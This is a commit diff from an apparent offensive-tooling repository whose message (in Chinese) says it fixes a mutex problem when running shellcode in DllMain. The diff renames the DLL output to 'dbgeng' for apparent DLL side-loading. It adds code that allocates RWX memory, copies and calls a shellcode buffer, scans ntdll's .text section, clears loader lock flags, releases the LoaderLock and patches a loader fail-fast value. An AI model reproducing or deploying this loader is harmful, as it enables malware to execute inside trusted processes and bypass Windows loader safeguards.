STRLCPY/SearchAvailableExe

解决dllmain中运行shellcode互斥问题
maoku committed 2 months ago

7791e78a

1 parent 372d24e8

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

TestLoad/TestLoad.vcxproj

		skipped 69 lines
70	70		<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
71	71		</ImportGroup>
72	72		<PropertyGroup Label="UserMacros" />
	73	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
	74	+	<TargetName>dbgeng</TargetName>
	75	+	</PropertyGroup>
	76	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
	77	+	<TargetName>dbgeng</TargetName>
	78	+	</PropertyGroup>
73	79		<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
74	80		<ClCompile>
75	81		<WarningLevel>Level3</WarningLevel>
		skipped 54 lines
130	136		<IntrinsicFunctions>true</IntrinsicFunctions>
131	137		<SDLCheck>true</SDLCheck>
132	138		<PreprocessorDefinitions>NDEBUG;TESTLOAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
133		-	<ConformanceMode>true</ConformanceMode>
	139	+	<ConformanceMode>false</ConformanceMode>
134	140		<PrecompiledHeader>NotUsing</PrecompiledHeader>
135	141		<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
136	142		<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
		skipped 22 lines

■ ■ ■ ■ ■ ■

TestLoad/dllmain.cpp

1	1		#include <Windows.h>
	2	+	#include <stdio.h>
2	3
3	4		#include "export.hpp"
4	5
		skipped 7 lines
12	13		LPVOID shellcode = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT \| MEM_RESERVE, 0x40);
13	14
14	15		memcpy(shellcode, buf, sizeof(buf));
15		-
	16	+	printf("%x \n", shellcode);
16	17		void(*func)();
17	18		func = (void(*)())shellcode;
18	19		func();
		skipped 180 lines
199	200		return 0;
200	201		}
201	202
	203	+	BYTE* readSectionData(BYTE* buffer, PDWORD rdataLength, char* secName) {
	204	+	PIMAGE_DOS_HEADER dosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(buffer);
	205	+	if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
	206	+	return 0;
	207	+	}
	208	+
	209	+	PIMAGE_NT_HEADERS ntHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(buffer) + dosHeader->e_lfanew);
	210	+	if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) {
	211	+	return 0;
	212	+	}
	213	+
	214	+	PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);
	215	+	for (int i = 0; i < ntHeaders->FileHeader.NumberOfSections; ++i) {
	216	+	if (strcmp(secName, (char*)sectionHeader[i].Name) == 0) {
	217	+	*rdataLength = sectionHeader[i].Misc.VirtualSize;
	218	+	return reinterpret_cast<BYTE*>(buffer) + sectionHeader[i].VirtualAddress;
	219	+	}
	220	+	}
	221	+
	222	+	return 0;
	223	+	}
	224	+
202	225		size_t GetSkipFileAPIBrokering(VOID)
203	226		{
204	227		#if defined(_WIN64)
		skipped 4 lines
209	232		}
210	233
211	234		#ifdef _WIN64
212		-	unsigned char lock_count_flag[] = { 0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00 };
	235	+	unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00};
	236	+	unsigned char win7_lock_count_flag[] = {0xF0, 0x44, 0x0F, 0xB1, 0x35};
213	237		#else
214	238		unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xCA, 0x0F, 0x00, 0x00, 0xE8};
	239	+	unsigned char win7_lock_count_flag[] = {0xC7, 0x45, 0xFC, 0xFE, 0xFF, 0xFF, 0xFF, 0xBB};
215	240		#endif
216	241
217	242		VOID UNLOOK()
218	243		{
219	244		HMODULE base = GetModuleHandleA("ntdll.dll");
220		-	PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)base;
221		-	DWORD size_of_img;
222		-
223		-	if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC){
224		-	PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew);
225		-	PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader;
226		-
227		-	size_of_img = pOH32->SizeOfImage;
228		-	}
229		-	else {
230		-	PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew);
231		-	PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader;
232		-
233		-	size_of_img = pOH64->SizeOfImage;
234		-	}
	245	+	DWORD rdataLength;
	246	+	BYTE* textData = readSectionData((BYTE*)base, &rdataLength, ".text");
235	247
236	248		//适用于win7以上的系统，需要格外修改值
237		-	size_t addr = memFind((BYTE*)base, lock_count_flag, (size_t)base + size_of_img, sizeof(lock_count_flag));
238		-	Sleep(1);
	249	+	size_t addr = memFind(textData, lock_count_flag, (size_t)textData + rdataLength, sizeof(lock_count_flag));
	250	+
239	251		if (addr != 0)
240	252		{
241	253		#ifdef _WIN64
242	254		addr = (size_t)addr + 0x15;
243	255		addr = addr + 5 + *(PDWORD)addr;
244		-	(PDWORD)addr = ((PDWORD)addr) & 0;
245	256		#else
246	257		addr = (size_t)addr + 0xe;
247	258		addr = *(PDWORD)addr;
248		-	(PDWORD)addr = ((PDWORD)addr) & 0;
249	259		#endif
	260	+	* (PDWORD)addr = (*(PDWORD)addr) & 0;
250	261
251	262		size_t skipFileAPIBrokeringAddr = GetSkipFileAPIBrokering();
252	263		((PWORD)skipFileAPIBrokeringAddr) = ((PWORD)skipFileAPIBrokeringAddr) & 0xEFFF;
		skipped 11 lines
264	275		RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddress((HMODULE)hModule, "RtlLeaveCriticalSection");
265	276
266	277		RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->LoaderLock);
	278	+
	279	+	//win7 和 08以下系统没有LdrFastFailInLoaderCallout导出函数
	280	+	size_t hookAddr = (size_t)GetProcAddress((HMODULE)hModule, "LdrFastFailInLoaderCallout");
	281	+
	282	+	if (hookAddr > 0) {
	283	+	#ifdef _WIN64
	284	+	hookAddr = hookAddr + 0x18 + 5 + *(PDWORD)(hookAddr + 0x18);
	285	+	#else
	286	+	hookAddr = *(PDWORD)(hookAddr + 0x13);
	287	+	#endif
	288	+	*(PDWORD)hookAddr = 2;
	289	+	}
	290	+
	291	+	addr = memFind(textData, win7_lock_count_flag, (size_t)textData + rdataLength, sizeof(win7_lock_count_flag));
	292	+	Sleep(1);
	293	+	if (addr != 0)
	294	+	{
	295	+	#ifdef _WIN64
	296	+	hookAddr = addr + 0x5 + 4 + *(PDWORD)(addr + 0x5);
	297	+	#else
	298	+	hookAddr = *(PDWORD)((size_t)addr + 0x8);
	299	+	#endif
	300	+	*(PDWORD)hookAddr = 2;
	301	+	}
267	302		}
268	303
269	304		BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
		skipped 11 lines

解决dllmain中运行shellcode互斥问题